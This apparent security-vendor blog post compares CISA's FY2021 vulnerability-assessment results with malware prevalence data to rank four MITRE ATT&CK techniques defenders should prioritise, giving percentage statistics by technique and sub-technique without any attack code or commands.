.svg)
.svg)
In 2021, The U.S. Cybersecurity and Infrastructure Security Agency (CISA) performed 112 Risk and Vulnerability Assessments (RVA) of multiple stakeholders across multiple industries to identify vulnerabilities that adversaries could be exploited by adversaries [1]. The CISA’s RVA teams map the findings of each RVA to the MITRE ATT&CK® framework. Leveraging this data, CISA determined the top 3 most successfully utilized ATT&CK techniques in each tactic [2]. Therefore, these ATT&CK techniques can also be used by adversaries successfully.
Utilizing a different methodology, Picus Labs annually publishes the 10 most prevalent ATT&CK techniques used by adversaries in malware. Following the release of CISA's FY21 RVA analysis, Picus Labs identified the four shared MITRE ATT&CK techniques in FY2021 RVA results and The Top 10 Most Prevalent MITRE ATT&CK techniques in the Picus Red Report 2021.
Organizations of all sizes should prioritize these four ATT&CK techniques to enhance their cybersecurity posture since they were the most successfully utilized techniques in organizations by CISA's RVA teams, and they were the most used techniques by adversaries in their malware.
In this blog post, we explained the four shared ATT&CK techniques listed in the CISA RVA and the Picus Red Report and showed which adversary techniques security teams should focus on their efforts in their defensive security operations.
Download the Red Report - Top Ten MITRE ATT&CK Techniques
CISA’s Risk and Vulnerability Assessments (RVA) Report
The Risk and Vulnerability Assessment (RVA) Report is an annual report that is published by CISA. The data presented in the CISA RVA Report is collected from various critical government and infrastructure organizations. CISA RVA teams organize and run tests and evaluations such as penetration testing, social engineering, configuration reviews, and detection analysis. The results of these tests and evaluations are combined and mapped to National Vulnerability Database (NIST NVD) and MITRE ATT&CK so that organizations can take action to remediate their cyber defenses.
CISA RVA Report for Fiscal Year of 2021 (FY2021) was published in May 2022. The report gathers all the vulnerabilities discovered in RVA all year and maps them to the MITRE ATT&CK framework. The report shows the most common vulnerabilities found for each stage of the attack path.
Picus Red Report
Picus Red Report is an annual report based on the research conducted by Picus Labs. In 2021, Picus Labs analyzed more than 200,000 malware samples used by threat actors and determined the 10 most prevalent ATT&CK techniques. 89% of the techniques and sub-techniques listed in the Picus Red Report are also reported as the most successful techniques in the CISA RVA Report.
The Top 4 MITRE ATT&CK Techniques Identified from the CISA’s RVA Analysis and Picus Red Report
Security teams should prioritize and focus on the ATT&CK techniques they are both vulnerable to and most used by attackers. Since the following four techniques are the most successfully utilized techniques by RVA teams (CISA FY2021 RVA analysis) and the most prevalent techniques used by adversaries (Picus Red Report), they are more likely to be successfully employed by attackers in a cyberattack campaign.
1. MITRE ATT&CK T1059 Command and Scripting Interpreter
T1059 Command and Scripting Interpreter is an Execution technique that cyber threat actors use to run commands, scripts, and binaries on the victim system. This technique was the most prevalent adversary technique in the Picus Red Report 2021 and the most common vulnerability under the TA002 Execution tactic of the CISA RVA FY2021 Report.
26% of malware reported in the Picus Red Report uses T1059 Command and Scripting Interpreter technique. On the exploitability side, CISA’s RVA teams successfully employed the T1059 Command and Scripting Interpreter technique for Execution in 15.1% of assessed organizations.
|
Technique Name |
Execution |
|
T1059.001 PowerShell |
12.7% |
|
T1059.002 AppleScript |
0.3% |
|
T1059.003 Windows Command Shell |
2.1% |
For more detailed information, you can check our blog post on the T1059 Command and Scripting Interpreter technique.
2. MITRE ATT&CK T1055 Process Injection
T1055 Process Injection is both categorized under Privilege Escalation and Defense Evasion tactics in the MITRE ATT&CK Framework. Cyber threat actors use the T1055 Process Injection technique to stay hidden and elevate their privileges in the victim system.
21% of malware reported in the Picus Red Report uses the T1055 Process Injection technique. On the exploitability side, CISA’s RVA teams successfully employed the T1055 Process Injection technique for Privilege Escalation in 19.7% of assessed organizations; for Defense Evasion in 12.5% of assessed organizations.
|
Technique Name |
Privilege Escalation |
Defense Evasion |
|
T1055 Process Injection |
19.7% |
10.4% |
|
T1055.012 Process Hollowing |
- |
2.1% |
Please check our blog post for more detailed information on this technique.
3. MITRE ATT&CK T1218 Signed Binary Proxy Execution
T1218 Signed Binary Proxy Execution is a Defense Evasion technique that adversaries use to bypass process or signature-based defenses in the victim’s system. The binaries that are signed with trusted digital certificates are called signed binaries. Process or signature-based defenses check binaries and allow them to execute on Windows OS. Adversaries abuse is known signed binaries to avoid detection by the security controls.
16% of malware reported in the Picus Red Report uses the T1218 Signed Binary Proxy Execution technique. On the exploitability side, CISA’s RVA teams successfully employed the T1218 Signed Binary Proxy Execution technique for Defense Evasion in 22.7% of assessed organizations; for Execution in 22% of assessed organizations.
|
Technique Name |
Defense Evasion |
Execution |
|
T1218.001 Compiled HTML File |
1.4% |
1.4% |
|
T1218.002 Control Panel |
0.7% |
0.7% |
|
T1218.003 CMSTP |
0.3% |
0.3% |
|
T1218.004 InstallUtil |
0.3% |
0.3% |
|
T1218.005 Mshta |
12.7% |
13.4% |
|
T1218.010 Regsvr32 |
1.4% |
1.4% |
|
T1218.011 Rundll32 |
5.2% |
5.2% |
In version 11 of the MITRE ATT&CK Framework, the name of the technique is changed to T1218 System Binary Proxy Execution. For more detailed information, you can check our blog post on the T1218 Signed Binary Proxy Execution technique.
4. MITRE ATT&CK T1003 OS Credential Dumping
T1003 OS Credential Dumping is a Credential Access technique that adversaries use to obtain login credentials such as account name and password of the victim system.
14% of malware reported in the Picus Red Report uses the T1003 OS Credential Dumping technique. On the exploitability side, CISA’s RVA teams successfully employed the T1003 OS Credential Dumping technique for Credential Access in 13.1% of assessed organizations.
For more detailed information, please check our blog post on OS Credential Dumping.
Conclusion
Although they are independent, the CISA RVA Report and the Picus Red Report approach the global cyber threat landscape from different perspectives. While CISA RVA reports on exploitable vulnerabilities in organizations’ networks, the Red Report focuses on commonly used techniques by adversaries.
According to this study, the top 4 MITRE ATT&CK techniques that are most successfully utilized by red teamers and most used by adversaries are:
1. T1059 Command and Scripting Interpreter
2. T1055 Process Injection
3. T1218 Signed Binary Proxy Execution
4. T1003 OS Credential Dumping
Unsurprisingly, both reports draw very similar conclusions. If a vulnerability is more common among the target networks, adversaries gain the most benefit from their activities. Therefore, we can say that the CISA RVA Report and the Picus Red Report are the two faces of the same coin.
References
[1] https://www.cisa.gov/sites/default/files/publications/FY21-RVA-Analysis_508c.pdf
[2] https://www.cisa.gov/sites/default/files/publications/RVA%20INFOGRAPHIC_508c.pdf
